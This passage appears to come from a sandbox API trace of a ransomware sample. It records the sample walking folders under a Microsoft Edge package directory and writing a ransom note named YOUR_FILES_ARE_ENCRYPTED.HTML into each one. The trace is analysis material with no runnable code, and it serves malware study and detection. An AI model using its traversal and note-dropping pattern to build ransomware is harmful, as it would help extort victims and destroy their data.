(lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\recovery\\active\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0116.389] WriteFile (in: hFile=0x318, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d52c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d52c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.390] CloseHandle (hObject=0x318) returned 1 [0116.390] GetProcessHeap () returned 0x600000 [0116.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.390] GetProcessHeap () returned 0x600000 [0116.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32d81a8 | out: hHeap=0x600000) returned 1 [0116.390] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x47fc06f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x78edcc8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x78edcc8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="Active", cAlternateFileName="")) returned 0 [0116.390] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0116.390] wnsprintfW (in: pszDest=0x32c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 155 [0116.391] GetProcessHeap () returned 0x600000 [0116.391] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\recovery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0116.391] WriteFile (in: hFile=0x338, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0116.392] CloseHandle (hObject=0x338) returned 1 [0116.392] GetProcessHeap () returned 0x600000 [0116.392] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.392] GetProcessHeap () returned 0x600000 [0116.392] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0116.394] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x47fc06f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x47fc06f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x47fc06f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f910, dwReserved1=0x25000025, cFileName="Recovery", cAlternateFileName="")) returned 0 [0116.394] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0116.394] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0116.394] GetProcessHeap () returned 0x600000 [0116.394] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0116.394] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0116.395] CloseHandle (hObject=0x324) returned 1 [0116.395] GetProcessHeap () returned 0x600000 [0116.395] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.395] GetProcessHeap () returned 0x600000 [0116.395] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.396] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4cc0d69, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4cc0d69, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="Default", cAlternateFileName="")) returned 0 [0116.396] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.396] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.396] GetProcessHeap () returned 0x600000 [0116.396] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.397] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.398] CloseHandle (hObject=0x31c) returned 1 [0116.398] GetProcessHeap () returned 0x600000 [0116.398] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.398] GetProcessHeap () returned 0x600000 [0116.398] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.399] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x429ee5c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x429ee5c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x429ee5c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="User", cAlternateFileName="")) returned 0 [0116.399] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.399] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0116.399] GetProcessHeap () returned 0x600000 [0116.399] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.400] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.401] CloseHandle (hObject=0x32c) returned 1 [0116.401] GetProcessHeap () returned 0x600000 [0116.401] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.401] GetProcessHeap () returned 0x600000 [0116.401] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.402] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x934dcb8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x934dcb8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.402] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.402] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp") returned 94 [0116.402] GetProcessHeap () returned 0x600000 [0116.402] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.403] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp" [0116.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x934dcb8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x934dcb8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.403] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x934dcb8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x934dcb8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 1 [0116.403] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x934dcb8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x934dcb8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 0 [0116.403] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.403] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0116.403] GetProcessHeap () returned 0x600000 [0116.403] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.404] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.405] CloseHandle (hObject=0x32c) returned 1 [0116.405] GetProcessHeap () returned 0x600000 [0116.405] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.405] GetProcessHeap () returned 0x600000 [0116.405] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.406] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x934dcb8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x934dcb8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.406] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.406] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0116.406] GetProcessHeap () returned 0x600000 [0116.406] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.407] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.408] CloseHandle (hObject=0x214) returned 1 [0116.408] GetProcessHeap () returned 0x600000 [0116.408] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.408] GetProcessHeap () returned 0x600000 [0116.408] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.409] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8802cde8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8802cde8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8802cde8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.409] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.409] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData") returned 94 [0116.409] GetProcessHeap () returned 0x600000 [0116.409] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.409] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData" [0116.409] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData\\*" [0116.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8802cde8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8802cde8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8802cde8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.410] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8802cde8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8802cde8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8802cde8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.410] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8802cde8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8802cde8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8802cde8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 0 [0116.410] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.410] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0116.410] GetProcessHeap () returned 0x600000 [0116.410] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.411] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.411] CloseHandle (hObject=0x214) returned 1 [0116.412] GetProcessHeap () returned 0x600000 [0116.412] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.412] GetProcessHeap () returned 0x600000 [0116.412] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.412] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.412] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.412] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache") returned 97 [0116.412] GetProcessHeap () returned 0x600000 [0116.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.413] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache" [0116.413] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache\\*" [0116.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.414] FindNextFileW (in: hFindFile=0x626778, 